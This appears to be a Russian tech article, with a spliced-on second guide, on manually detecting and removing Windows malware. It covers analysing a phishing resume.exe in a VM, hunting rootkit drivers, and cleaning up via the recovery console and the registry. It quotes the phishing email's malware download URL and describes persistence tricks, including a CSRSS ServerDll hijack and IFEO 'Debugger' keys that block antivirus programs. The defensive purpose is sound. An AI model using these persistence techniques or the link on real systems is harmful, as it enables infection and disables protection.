        Развитие антивирусов тоже не стоит на месте, - они постоянно совершенствуются, и в большинстве случаев, смогут обнаружить и обезвредить вредоносное ПО, но рано или поздно, найдется модификация вируса, которая какое-то время будет "не по зубам" любому антивирусу. Поэтому самостоятельное обнаружение и удаление вируса - это работа, которую рано или поздно придется выполнять любому пользователю компьютера.

    Здравствуйте.
    Нас заинтересовала ваша кандидатура, однако предлагаем вам заполнить
    наш фирменный бланк резюме и отправить его по адресу [email protected]
    Ответ не гарантируется, однако если Ваше резюме нас заинтересует, мы
    позвоним Вам в течение нескольких дней. Не забудьте
    указать телефон, а также позицию, на которую Вы претендуете. Желательно
    также указать пожелания по окладу.
    Наш фирменный бланк вы можете скачать по нижеуказанной ссылке.
    http://verano-konwektor.pl/resume.exe

        Анализ заголовков письма показал, что оно было отправлено с компьютера в Бразилии через сервер, находящийся в США. А фирменный бланк предлагается скачать с сервера в Польше. И это с русскоязычным-то содержанием.

        Ясное дело, что никакого фирменного бланка вы не увидите, и скорее всего, получите троянскую программу на свой компьютер.
        Скачиваю файл resume.exe. Размер - 159744 байта. Пока не запускаю.
        Копирую файл на другие компьютеры, где установлены различные антивирусы - просто для очередной проверки их эффективности. Результаты не ахти - антивирус Avast 4.8 Home Edition деликатно промолчал. Подсунул его Symantec"у - та же реакция. Сработал только AVG 7.5 Free Edition. Похоже, этот антивирус, в самом деле, не зря набирает популярность.
        Все эксперименты выполняю на виртуальной машине с операционной системой Windows XP. Учетная запись с правами администратора, поскольку, чаще всего вирусы успешно внедряются в систему только, если пользователь является локальным администратором.
        Запускаю. Через какое-то время зараженный файл исчез, похоже, вирус начал свое черное дело.
        Поведение системы внешне не изменилось. Очевидно, нужна перезагрузка. На всякий случай, запрещаю в брандмауэре соединения по протоколу TCP. Оставляю разрешенными только исходящие соединения по UDP:53 (DNS) - надо же оставить вирусу хоть какую-то возможность проявить свою активность. Как правило, после внедрения, вирус должен связаться с хозяином или с заданным сервером в интернете, признаком чего будут DNS-запросы. Хотя, опять же, в свете сказанного выше, умный вирус может их замаскировать, кроме того, он может и обойти брандмауэр. Забегая вперед, скажу, что в данном конкретном случае этого не произошло, но для надежного анализа сетевой активности весь трафик зараженной машины лучше пустить через другую, незараженную, где можно быть уверенным, что правила брандмауэра выполняются, а анализатор трафика (я пользовался Wireshark"ом) выдает то, что есть на самом деле.
        Перезагружаюсь. Внешне ничего не изменилось, кроме того, что невозможно выйти в интернет, поскольку я сам отключил такую возможность. Ни в путях автозапуска, ни в службах, ни в системных каталогах не появилось ничего нового. Просмотр системного журнала дает только одну наводку - системе не удалось запустить таинственную службу grande48 . Такой службы у меня быть не могло, да и по времени это событие совпало с моментом внедрения. Что еще наводит на мысль об успешном внедрении - так это отсутствие в реестре записи о службе grande48 и отсутствие второго сообщения в журнале системы об ошибке запуска службы после перезагрузки. Это, скорее всего, некоторая недоработка вирусописателей. Хотя и несущественная, ведь большинство пользователей журнал событий не просматривают, да и на момент возникновения подозрения на заражение эта запись в журнале уже может и отсутствовать.

    Определяем наличие вируса в системе.

    1.     Наверняка должен быть "левый" трафик. Определить можно с помощью анализаторов протокола. Я использовал Wireshark. Сразу после загрузки первым запускаю его. Все правильно, есть наличие группы DNS-запросов (как потом оказалось - один раз за 5 минут) на определение IP-адресов узлов ysiqiyp.com, irgfqfyu.com, updpqpqr.com и т.п. Вообще-то все ОС Windows любят выходить в сеть, когда надо и не надо, антивирусы могут обновлять свои базы, поэтому определить принадлежность трафика именно вирусу довольно затруднительно. Обычно требуется пропустить трафик через незараженную машину и серьезно проанализировать его содержимое. Но это отдельная тема. В принципе, косвенным признаком ненормальности сетевой активности системы могут быть значительные значения счетчиков трафика провайдера, в условиях простоя системы, счетчики из свойств VPN-соединения и т.п.

    2.     Попробуем использовать программы для поиска руткитов. Сейчас таких программ уже немало и их несложно найти в сети. Одна из наиболее популярных - Марка Руссиновича, которую можно скачать на странице раздела Windows Sysinternals сайта Microsoft. Инсталляция не требуется. Разархивируем и запускаем. Жмем "Scan". После непродолжительного сканирования видим результаты:

        Кстати, даже не вникая в содержания строк, можно сразу заметить, что имеются очень "свежие" по времени создания/модификации записи или файлы (колонка "Timestamp") . Нас в первую очередь должны заинтересовать файлы с описанием (колонка "Description" ) - "Hidden from Windows API" - скрыто от API-интерфейса Windows. Скрытие файлов, записей в реестре, приложений - это, естественно, ненормально. Два файла - grande48.sys и Yoy46.sys - это как раз то, что мы ищем. Это и есть прописавшийся под видом драйверов искомый руткит или его часть, обеспечивающая скрытность. Наличие в списке остальных было для меня сюрпризом. Проверка показала - это нормальные драйверы Windows XP. Кроме того, вирус скрывал их наличие только в папке \system32 , а их копии в \system32\dllcache остались видимыми.
        Напомню, что в Windows XP применяется специальный механизм защиты системных файлов, называемый Windows File Protection (WFP) . Задача WFP - автоматическое восстановление важных системных файлов при их удалении или замене устаревшими или неподписанными копиями. Все системные файлы Windows XP имеют цифровую подпись и перечислены в специальной базе данных, используемой WFP. Для хранения копий файлов используется папка \system32\dllcache и, отчасти, \Windows\driver cache . При удалении или замене одного из системных файлов, WFP автоматически копирует "правильную" его копию из папки \dllcache. Если указанный файл отсутствует в папке \dllcache , то Windows XP просит вставить в привод компакт-дисков установочный компакт-диск Windows XP. Попробуйте удалить vga.sys из \system32, и система тут же его восстановит, используя копию из dllcache. А ситуация, когда, при работающей системе восстановления файлов, файл драйвера есть в \dllcache и его не видно в \system32 - это тоже дополнительный признак наличия руткита в системе.

    Удаляем вирус из системы.

        Осталось выполнить самое важное действие - удалить вирус. Самый простой и надежный способ - загрузиться в другой, незараженной операционной системе и запретить старт драйверов руткита.

    Воспользуемся стандартной консолью восстановления Windows. Берем установочный диск Windows XP и загружаемся с него. На первом экране выбираем 2-й пункт меню - жмем R.

    Выбираем систему (если их несколько):

    Вводим пароль администратора.
    Список драйверов и служб можно просмотреть с помощью команды listsvc:

    В самом деле, в списке присутствует Yoy46 , правда отсутствует grande48, что говорит о том, что файл драйвера grande48.sys скрытно присутствует в системе, но не загружается:

    Консоль восстановления позволяет запрещать или разрешать запуск драйверов и служб с помощью команд disable и enable . Запрещаем старт Yoy46 командой:

        Водим команду EXIT и система уходит на перезагрузку.
    После перезагрузки драйвер руткита не будет загружен, что позволит легко удалить его файлы и очистить реестр от его записей. Можно проделать это вручную, а можно использовать какой-нибудь антивирус. Наиболее эффективным, с моей точки зрения, будет бесплатный сканер на основе всем известного антивируса Dr.Web Игоря Данилова. Скачать можно отсюда - http://freedrweb.ru
        Там же можно скачать "Dr.Web LiveCD" - образ диска, который позволяет восстановить работоспособность системы, пораженной действиями вирусов, на рабочих станциях и серверах под управлением Windows\Unix, скопировать важную информацию на сменные носители либо другой компьютер, если действия вредоносных программ сделали невозможным загрузку компьютера. Dr.Web LiveCD поможет не только очистить компьютер от инфицированных и подозрительных файлов, но и попытается вылечить зараженные объекты. Для удаления вируса нужно скачать с сайта DrWeb образ (файл с расширением.iso) и записать его на CD. Будет создан загрузочный диск, загрузившись с которого, руководствуетесь простым и понятным меню.

        Если по каким-либо причинам, нет возможности воспользоваться Dr.Web LiveCD, можно попробовать антивирусный сканер Dr.Web CureIt!, который можно запустить, загрузившись в другой ОС, например, с использованием Winternals ERD Commander. Для сканирования зараженной системы необходимо указать именно ее жесткий диск (Режим "Выборочная проверка"). Сканер поможет вам найти файлы вируса, и вам останется лишь удалить связанные с ним записи из реестра.
        Поскольку вирусы научились прописываться на запуск в безопасном режиме загрузки, не мешает проверить ветку реестра:

    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Control\SafeBoot
    Разделы:
    Minimal - список драйверов и служб запускаемых в безопасном режиме (Safe Mode)
    Network - то же, но с поддержкой сети.

    Добавлю, что существует новый класс rootkit, представителем которого является BackDoor.MaosBoot , появившийся в конце 2007г. Эта троянская программа прописывает себя в загрузочный сектор жесткого диска и обеспечивает скрытую установку своего драйвера в памяти. Сам Rootkit-драйвер напрямую записан в последние секторы физического диска, минуя файловую систему, чем и скрывает свое присутствие на диске. В общем-то, принцип не новый, лет десять назад вредоносные программы подобным образом маскировались на резервных дорожках дискет и жестких дисков, однако оказался очень эффективным, поскольку большинство антивирусов с задачей удаления BackDoor.MaosBoot до сих пор не справляются. Упоминаемый выше загрузочный сектор не проверяет, а секторы в конце диска для него никак не связаны с файловой системой и, естественно, такой руткит он не обнаружит. Правда, Dr.Web (а, следовательно, и Cureit) с BackDoor.MaosBoot вполне справляется.

        Если у вас возникли сомнения относительно какого-либо файла, то можно воспользоваться бесплатной онлайновой антивирусной службой virustotal.com . Через специальную форму на главной странице сайта закачиваете подозрительный файл и ждете результатов. Сервисом virustotal используются консольные версии множества антивирусов для проверки вашего подозреваемого файла. Результаты выводятся на экран. Если файл является вредоносным, то с большой долей вероятности, вы сможете это определить. В какой-то степени сервис можно использовать для выбора "лучшего антивируса".
    ссылка на одну из веток форума сайта virusinfo.info, где пользователи выкладывают ссылки на различные ресурсы посвященные антивирусной защите, в т.ч. и онлайн - проверок компьютера, браузера, файлов...

        Иногда, в результате некорректных действий вируса (или антивируса) система вообще перестает загружаться. Приведу характерный пример. Вредоносные программы пытаются внедриться в систему, используя различные, в том числе, довольно необычные способы. В процессе начальной загрузки, еще до регистрации пользователя, запускается "Диспетчер сеансов" (\SystemRoot\System32\smss.exe) , задача которого - запустить высокоуровневые подсистемы и сервисы (службы) операционной системы. На этом этапе запускаются процессы CSRSS (Client Server Runtime Process), WINLOGON (Windows Logon), LSASS (LSA shell), и оставшиеся службы с параметром Start=2 из раздела реестра

    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Services

        Информация, предназначенная для диспетчера сеансов, находится в ключе реестра

    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Control\Session Manager

    Одним из способов внедрения в систему, является подмена dll-файла для CSRSS. Если вы посмотрите содержимое записи

    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Control\Session Manager\SubSystems

    То найдете значения

    ServerDll=basesrv , ServerDll=winsrv . Библиотеки basesrv.dll и winsrv.dll - это "правильные" файлы системы, загружаемые службой CSRSS на обычной (незараженной) системе. Эту запись в реестре можно подправить на запись, обеспечивающую загрузку, например, вместо basesrv.dll, вредоносной basepvllk32.dll:

    ServerDll=basepvllk32 (или какую либо другую dll, отличную от basesrv и winsrv)

    Что обеспечит, при следующей перезагрузке, получение управления вредоносной программе. Если же ваш антивирус обнаружит и удалит внедренную basepvllk32, оставив нетронутой запись в реестре, то загрузка системы завершится "синим экраном смерти" (BSOD) с ошибкой STOP c000135 и сообщением о невозможности загрузить basepvllk32.

    Поправить ситуацию можно так:

    Загрузится в консоль восстановления (или в любой другой системе), и скопировать файл basesrv.dll из папки C:\WINDOWS\system32 в ту же папку под именем basepvllk32.dll. После чего система загрузится и можно будет вручную подправить запись в реестре.
    - загрузиться с использованием Winternals ERD Commander и исправить запись в реестре на ServerDll=basesrv . Или выполнить откат системы с использованием точки восстановления.

        Еще один характерный пример. Вредоносная программ регистрируется как отладчик процесса explorer.exe, создавая в реестре запись типа:

    "Debugger"="C:\Program Files\Microsoft Common\wuauclt.exe"
    Удаление wuauclt.exe антивирусом без удаления записи в реестре приводит к невозможности запуска explorer.exe. В результате вы получаете пустой рабочий стол, без каких-либо кнопок и ярлыков. Выйти из положения можно используя комбинацию клавиш CTRL-ALT-DEL. Выбираете "Диспетчер задач" - "Новая задача" - "Обзор" - находите и запускаете редактор реестра regedit.exe. Затем удаляете ключ
    HKM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe
    и перезагружаетесь.

        В случае, когда вы точно знаете время заражения системы, откат на точку восстановления до этого события, является довольно надежным способом избавления от заразы. Иногда есть смысл выполнять не полный откат, а частичный, с восстановлением файла реестра SYSTEM, как это описано в статье "Проблемы с загрузкой ОС" раздела "Windows"

        == Май 2008. ==

    Дополнение

        Это дополнение возникло через год после написания основной статьи. Здесь я решил разместить наиболее интересные решения, возникшие в процессе борьбы с вредоносным программным обеспечением. Что-то вроде коротких заметок.

    После удаления вируса ни один антивирус не работает.

        Случай интересен тем, что способ блокировки антивирусного программного обеспечения можно использовать и в борьбе с исполняемыми файлами вирусов. Началось все с того, что после удаления довольно примитивного вируса не заработал лицензионный "Стрим Антивирус". Переустановки с чисткой реестра не помогли. Попытка установки Avira Antivir Personal Free закончилась успешно, но сам антивирус не запустился. В системном журнале было сообщение о таймауте при запуске службы "Avira Antivir Guard". Перезапуск вручную заканчивался той же ошибкой. Причем, никаких лишних процессов в системе не выполнялось. Была стопроцентная уверенность - вирусов, руткитов и прочей гадости (Malware) в системе нет.
        В какой-то момент попробовал запустить антивирусную утилиту AVZ . Принцип работы AVZ во многом основан на поиске в изучаемой системе разнообразных аномалий. С одной стороны, это помогает в поиске Malware, но с другой вполне закономерны подозрения к компонентам антивирусов, антишпионов и прочего легитимного ПО, активно взаимодействующего с системой. Для подавления реагирования AVZ на легитимные объекты и упрощения анализа результатов проверки системы за счет отметки легитимных объектов цветом и их фильтрации из логов, применяется база безопасных файлов AVZ. С недавнего времени запущен полностью автоматический сервис, позволяющий всем желающим прислать файлы для пополнения этой базы.
    Но: исполняемый файл avz.exe не запустился! Переименовываю avz.exe в musor.exe - все прекрасно запускается. В очередной раз AVZ оказался незаменимым помощником в решении проблемы. При выполнении проверок в результатах появилась строки:

    Опасно - отладчик процесса "avz.exe"="ntsd-d"
    Опасно - отладчик процесса "avguard.exe"="ntsd-d"
    :.

    Это была уже серьезная зацепка. Поиск в реестре по контексту "avz" привел к обнаружению в ветке

    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options

    Раздела с именем avz.exe , содержащем строковый параметр с именем "Debugger" и значением .
    И, как выяснилось позже, в указанной ветке присутствовал не только раздел "avz.exe", но и разделы с именами исполняемых модулей практически всех известных антивирусов и некоторых утилит мониторинга системы. Сам ntsd.exe - вполне легальный отладчик Windows, стандартно присутствующий во всех версиях ОС, но подобная запись в реестре приводит к невозможности запуска приложения, имя исполняемого файла которого совпадает с именем раздела???.exe.

        После удаления из реестра всех разделов, c именем???.exe и содержащих запись "Debugger" = "ntsd -d" работоспособность системы полностью восстановилась.

    В результате анализа ситуации с использованием параметра "ntsd -d" для блокировки запуска исполняемых файлов, появилась мысль использовать этот же прием для борьбы с самими вирусами. Конечно, это не панацея, но в какой-то степени может снизить угрозу заражения компьютера вирусами с известными именами исполняемых файлов. Для того, чтобы в системе невозможно было выполнить файлы с именами ntos.exe, file.exe, system32.exe и т.п. можно создать reg-файл для импорта в реестр:

    Windows Registry Editor Version 5.00

    "Debugger"="ntsd -d"
    "Debugger"="ntsd -d"
    "Debugger"="ntsd -d"
    :.. и т.д.

    Обратите внимание, на то, что имя раздела не содержат пути файла, поэтому данный способ нельзя применять для файлов вирусов, имена которых совпадают с именами легальных исполняемых файлов, но сами файлы нестандартно размещены в файловой системе. Например, проводник Explorer.exe находится в папке \WINDOWS\, а вирус располагается где-то в другом месте - в корне диска, в папке \temp, \windows\system32\ Если вы создадите раздел с именем "Explorer.exe" - то после входа в систему вы получите пустой рабочий стол, поскольку проводник не запустится. Хуже того, если вы создадите раздел, имя которого совпадает с именем системной службы (winlogon.exe, csrss.exe, smss.exe, services.exe, lsass.exe), то получите рухнувшую систему. Если вирус находится в C:\temp\winlogon.exe, а легальный модуль входа в систему C:\WINDOWS\SYSTEM32\winlogon.exe, создание раздела с именем winlogon.exe приведет к невозможности запуска службы winlogon и краху системы с синим экраном смерти (BSOD).

        Но, все же, надеяться на то, что запрашиваемый вирусом код, подойдет в каждом конкретном случае, не стоит. Как не стоит надеяться на честное самоуничтожение вируса, и тем более, не стоит отправлять СМС. Любой вирус можно удалить, даже если он не обнаруживается антивирусами. Методики удаления вируса-вымогателя ничем не отличаются от методик удаления любого другого вредоносного ПО, с одним, пожалуй, отличием - не стоит тратить время на попытки справиться с дрянью в среде зараженной системы, разве что для развития собственных навыков и пополнения знаний.

    Наиболее простой и эффективный путь - загрузиться с использованием другой, незараженной системы и, подключившись к зараженной, удалить файлы вируса и исправить внесенные им записи в реестре. Об этом я уже писал выше, в основной части статьи, а здесь попытаюсь просто изложить несколько кратких вариантов удаления вируса.

  • Использование Dr.Web LiveCD - самый простой и не требующий специальных знаний способ. Скачиваете iso-образ CD, записываете его на болванку, загружаетесь с CD-ROM и запускаете сканер.
  • Использование Winternals ERD Commander. Загружаетесь с него, подключившись к зараженной системе, и выполняете откат на контрольную точку восстановления с датой, когда заражения еще не было. Выбираете меню System Tools - System Restore . Если откат средствами ERD Commander"а выполнить невозможно, попробуйте вручную найти файлы реестра в данных контрольных точек и восстановить их в каталог Windows. Как это сделать я подробно описал в статье "Работа с реестром".
  • Загрузка в другой ОС и ручное удаление вируса. Самый сложный, но самый эффективный способ. В качестве другой ОС удобнее всего использовать тот же ERD Commander. Методика обнаружения и удаления вируса может быть следующей:

    Переходите на диск зараженной системы и просматриваете системные каталоги на наличие исполняемых файлов и файлов драйверов с датой создания близкой к дате заражения. Перемещаете эти файлы в отдельную папку. Обратите внимание на каталоги

    \Windows
     \Windows\system32
     \Windows\system32\drivers
     \Windows\Tasks\
     \RECYCLER
    \System Volume Information
     Каталоги пользователей \Documents And Settings\All Users и \Documents And Settings\имя пользователя

    Очень удобно использовать для поиска таких файлов FAR Manager, с включенной сортировкой по дате для панели, где отображается содержимое каталога (комбинация CTRL-F5). Особое внимание стоит обратить на скрытые исполняемые файлы. Существует также эффективная и простая утилита от Nirsoft - SearchMyFiles, применение которой позволяет, в подавляющем большинстве случаев, легко обнаружить вредоносные файлы даже без использования антивируса. Способ обнаружения вредоносных файлов по времени создания (Creation time)

    Подключаетесь к реестру зараженной системы и ищете в нем ссылки на имена этих файлов. Сам реестр не мешает предварительно скопировать (полностью или, по крайней мере, те части, где встречаются выше указанные ссылки). Сами ссылки удаляете или изменяете в них имена файлов на другие, например - file.exe на file.ex_, server.dll на server.dl_, driver.sys на driver.sy_.

    Данный способ не требует особых знаний и в случаях, когда вирус не меняет дату модификации своих файлов (а это пока встречается очень редко) - дает положительный эффект. Даже если вирус не обнаруживается антивирусами.

    Если предыдущие методики не дали результата, остается одно - ручной поиск возможных вариантов запуска вируса. В меню Administrative Tools ERD Commander"а имеются пункты:

    Autoruns - информация о параметрах запуска приложений и оболочке пользователя.
    Service and Driver Manager - информация о службах и драйверах системы.

  • - В качестве продолжения темы - как избавиться от вирусов с помощью стандартных средств операционной системы Windows Vista \ Windows 7. Использование безопасного режима с поддержкой командной строки.
  • Использование загрузочного диска Winternals ERD Commander - Подробная инструкция по применению диска аварийного восстановления системы, созданного на базе Microsoft Diagnostic and Recovery Toolset (MS DaRT) .
  • Сайт Олега Зайцева, автора AVZ. - Посвящен информационной безопасности, и в частности - применению одной из наиболее эффективных антивирусных утилит AVZ.
  • Восстановление системы после вирусного заражения Как восстановить работоспособность Windows после удаления вируса, повредившего некоторые настройки. Помогает в случаях, когда не запускаются программы, при подмене страниц, открываемых обозревателем, подмене домашней страницы, страницы поиска, при изменении настроек рабочего стола, невозможности запуска редактора реестра, отсутствии доступа в Интернет, недоступности некоторых сайтов и т.п.

    • На сегодняшний день поголовье вирусов исчисляется сотнями тысяч! Среди такого разнообразия подхватить эту заразу к себе на компьютер проще простого!

    В этой статье последовательно рассмотрим, как можно удалить вирусы с компьютера в различных ситуациях.

    1. Что такое вирус. Симптомы заражения вирусами

    Вирус - это само размножающаяся программа. Но если бы они только размножалась, то бороться с ними можно было бы не так рьяно. Часть вирусов может существовать вообще никак не мешая пользователю до определенного момента и в час икс даст о себе знать: могут блокировать доступ к определенным сайтам, удалять информацию и т.д. В общем, мешают пользователю нормально работать за ПК.

    Компьютер при заражении вирусом начинает вести себя нестабильно. Вообще, симптомов может быть десятки. Иногда пользователь даже не догадывается, что у него на ПК вирус. Стоит насторожиться и проверить компьютер антивирусом, если есть следующие признаки:

    1) Снижение скорости работы ПК. Кстати, про то, (если, конечно, у вас нет вирусов) мы разбирали ранее.

    2) Файлы перестают открываться, часть файлов может стать испорчена. Особенно, это касается программ, т.к. вирусы заражают exe и com файлы.

    3) Снижение скорости работы программ, служб, сбои и ошибки приложений.

    4) Блокировка доступа к части интернет-страничек. Особенно самых популярных: вконтакте, одноклассники и пр.

    5) Блокировка ОС Windows, просьба отослать СМС для разблокировки.

    6) Пропажа паролей от доступа к различным ресурсам (кстати, этим занимаются обычно троянские программы, которые, впрочем, можно так же отнести к вирусам).

    Перечень далеко не полный, но если есть хоть один из пунктов - вероятность заражения очень высокая.

    2. Как удалить вирусы с компьютера (в зависимости от вида)

    2.1. «Обычный» вирус

    Под словом обычный следует понимать то, что вирус не заблокирует вам доступ к работе в ОС Windows.

    Для начала следует скачать одну из утилит для проверки компьютера. Одними из лучших являются:

    3) Открываете файл avz.exe.

    4) После запуска AVZ вам будут доступны три основные вкладки: область поиска, типы файлов и параметры поиска.В первой вкладке выберите диски, которые будут проверяться (обязательно выберите системный диск). Поставьте галочки, чтобы программа проверяла запущенные процессы, провела эвристическую проверку системы и искала потенциальные уязвимости. В методике лечения включите опции, которые будут определять, что делать с вирусами: удалять, или спросить у пользователя. Скриншот с перечисленными настройками чуть ниже.

    5) Во вкладке типы файлов, выберите проверку всех файлов, включите проверку всех архивов без исключения. Скриншот ниже.

    6) В параметрах поиска отметьте максимальный режим эвристики, включите детектирование Anti-Rootkit, поиск клавиатурных перехватчиков, исправление системных ошибок, поиск троянских программ.

    7) После задания настроек можно нажать на кнопку пуск. Проверка длится довольно долго, в это время лучше не выполнять параллельно другие процессы, т.к. AVZ часть файлов блокирует. После проверки и удаления вирусов - перезагрузите ПК. Затем установите какой-нибудь и проверьте полностью компьютер.

    2.2. Вирус блокирующий Windows

    Основная проблема с такими вирусами - это невозможность работы в ОС. Т.е. для того, чтобы вылечить компьютер - вам нужен либо второй ПК, либо заранее подготовленные диски. В крайнем случае можно попросить знакомых, друзей и т.д.

    В этой системной утилите можно увидеть, что у вас находится в автозагрузке. Отключите все!

    2) Если компьютер не удается загрузить в безопасном режиме, придется прибегнуть к Live CD. Это специальный загрузочный диск, которым можно проверить диск на наличие вирусов (+ удалить их, если таковые имеются), скопировать данные с HDD на другие носители. На сегодняшний день самыми популярными являются три специализированных аварийных диска:

    Отличная и бесплатная утилита для защиты ПК от вирусов и шпионов. Способен обеспечивать защиту ПК в режиме реального времени.

    Что особо радует: легко устанавливается, быстро работает, не отвлекает вас ненужными сообщениями и уведомлениями.

    Некоторые пользователи считают его не очень надежным. С другой стороны, даже такой антивирус способен вас сберечь от львиной доли опасности. Не у всех же есть деньги на покупки дорогих антивирусов, впрочем, ни одна антивирусная программа не дает 100% гарантии!

    Антивирусный сканер, способный различать огромное количество вирусов. Он легко и быстро встраивается в контекстное меню проводника. Базы регулярно обновляются, благодаря чему антивирус всегда сможет вас оградить от большинства угроз.

    Особо радует нетребовательность данного антивируса. Из минусов, многие отмечают его неказистый вид. Правда, реально ли это так важно для антивирусной программы?

    В любом случае, хотя бы один антивирус на компьютере необходимо иметь (+ крайне желательно установочный диск с Windows и Live CD на случай удаления вирусов).

    Итоги. В любом случае, угрозу заражения легче предотвратить, чем пытаться удалить вирус. Ряд мер способен свести к минимуму риски:

    • Установка антивирусной программы, регулярное ее обновление.
    • Обновление самой ОС Windows. Все таки разработчики не просто так выпускают критические обновления.
    • Не качать сомнительные ключи и трейнеры к играм.
    • Не устанавливать подозрительное ПО.
    • Не открывать почтовые вложения от неизвестных адресатов.
    • Регулярно нужных и важных файлов.

    Даже этот простой набор спасет вас от 99% напастей.

    Желаю вам удалить все вирусы с компьютера без потери информации. Удачного лечения.